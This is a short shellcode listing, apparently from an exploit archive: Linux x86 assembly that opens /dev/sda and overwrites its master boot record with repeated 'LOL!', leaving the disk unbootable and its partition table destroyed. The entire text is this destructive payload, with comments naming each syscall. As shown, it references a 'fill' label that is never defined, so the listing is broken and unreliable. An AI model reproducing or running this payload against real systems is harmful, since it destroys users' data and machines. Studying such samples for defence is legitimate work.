Linux/x86 - Overwrite MBR On /dev/sda With `LOL!' Shellcode (43 bytes)
; linux/x86 overwrite MBR on /dev/sda with `LOL!' 43 bytes
; root@thegibson
; 2010-01-15
section .text
global _start
; open("/dev/sda", O_WRONLY);
mov al, 5
xor ecx, ecx
push ecx
push dword 0x6164732f
push dword 0x7665642f
mov ebx, esp
inc ecx
int 0x80
; write(fd, "LOL!"x128, 512);
mov ebx, eax
mov al, 4
push edx
mov cl, 128
push dword 0x214c4f4c
loop fill
mov ecx, esp
inc edx
shl edx, 9
int 0x80